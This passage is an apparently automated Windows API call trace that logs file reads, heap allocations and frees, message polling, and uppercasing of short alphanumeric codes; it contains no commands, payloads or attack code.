(in: hFile=0x4f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0152.215] ReadFile (in: hFile=0x4f8, lpBuffer=0x2a7a130, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0152.218] ReadFile (in: hFile=0x4f8, lpBuffer=0x2a7a130, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesRead=0x8cf4f8*=0x4669, lpOverlapped=0x0) returned 1 [0152.218] ReadFile (in: hFile=0x4f8, lpBuffer=0x2a7a130, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0152.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0152.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0152.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0152.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0152.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14669) returned 0x2aaf410 [0152.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x4cd8020 | out: hHeap=0x2af0000) returned 1 [0152.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0152.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0152.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0152.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0152.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0152.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0152.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0152.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0152.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14669) returned 0x2ac3a88 [0152.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaf410 | out: hHeap=0x2af0000) returned 1 [0152.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0152.224] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0152.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0152.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0152.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0152.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0152.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14669) returned 0x2aaf410 [0152.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0152.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaf410 | out: hHeap=0x2af0000) returned 1 [0152.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0152.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0152.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0152.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0152.225] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0152.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0152.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0152.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0152.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0152.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0152.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0152.225] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0152.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0152.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0152.225] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0152.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0152.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0152.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0152.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722b8 [0152.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0152.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f40 [0152.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0152.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0152.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14669) returned 0x2aaf410 [0152.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0152.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72338 [0152.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0152.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0152.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0152.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72268 [0152.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0152.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0152.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0152.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72348 [0152.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1e0 [0152.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0152.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0152.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa0a8 [0152.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0152.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0152.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0152.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0152.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0152.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0152.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0152.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14669) returned 0x37c0048 [0152.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0152.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0152.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72358 [0152.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0152.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0152.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0152.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0152.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0152.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0152.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0152.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0152.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0152.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0152.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa030 [0152.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0152.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa030 | out: hHeap=0x2af0000) returned 1 [0152.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0152.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0152.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0152.229] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0152.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72548 [0152.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0152.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0152.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72558 [0152.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0152.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0152.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0152.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0152.230] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0152.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0152.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0152.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0152.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0152.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0152.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0152.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0152.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0152.230] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0152.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0152.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0152.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0152.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0152.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0152.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0152.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0152.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0152.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0152.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0152.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0152.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0152.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0152.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa090 [0152.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0152.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0152.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0152.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0152.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0152.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0152.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0152.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0152.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0152.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0152.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0152.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0152.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0152.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0152.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0152.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0152.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0152.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0152.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0152.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0152.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0152.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0152.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0d8 | out: hHeap=0x2af0000) returned 1 [0152.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0152.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa030 [0152.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0152.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0152.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0152.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0152.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0152.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0152.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0152.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0152.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0152.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0152.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0152.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa030 | out: hHeap=0x2af0000) returned 1 [0152.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0152.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0152.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0152.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0152.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0152.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0152.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0152.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0152.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0152.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0152.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0152.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0152.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa030 [0152.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0152.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0152.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0152.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0152.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0152.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0152.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0152.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0152.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0152.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa048 [0152.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0152.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0152.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0152.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0152.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0d8 | out: hHeap=0x2af0000) returned 1 [0152.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0152.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0152.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa450 [0152.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0152.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0152.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0152.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0152.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0152.233] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0152.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0152.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0152.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9fb8 [0152.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0152.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72578 [0152.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0152.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3c0 [0152.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa378 [0152.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0152.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3f0 [0152.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0152.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0152.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0152.234] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0152.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0152.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0152.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3f0 | out: hHeap=0x2af0000) returned 1 [0152.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa378 | out: hHeap=0x2af0000) returned 1 [0152.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3c0 | out: hHeap=0x2af0000) returned 1 [0152.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0152.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0152.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0152.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0152.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72578 [0152.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0152.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0152.234] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0152.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0152.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0152.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa240 [0152.234] RtlAllocateHeap 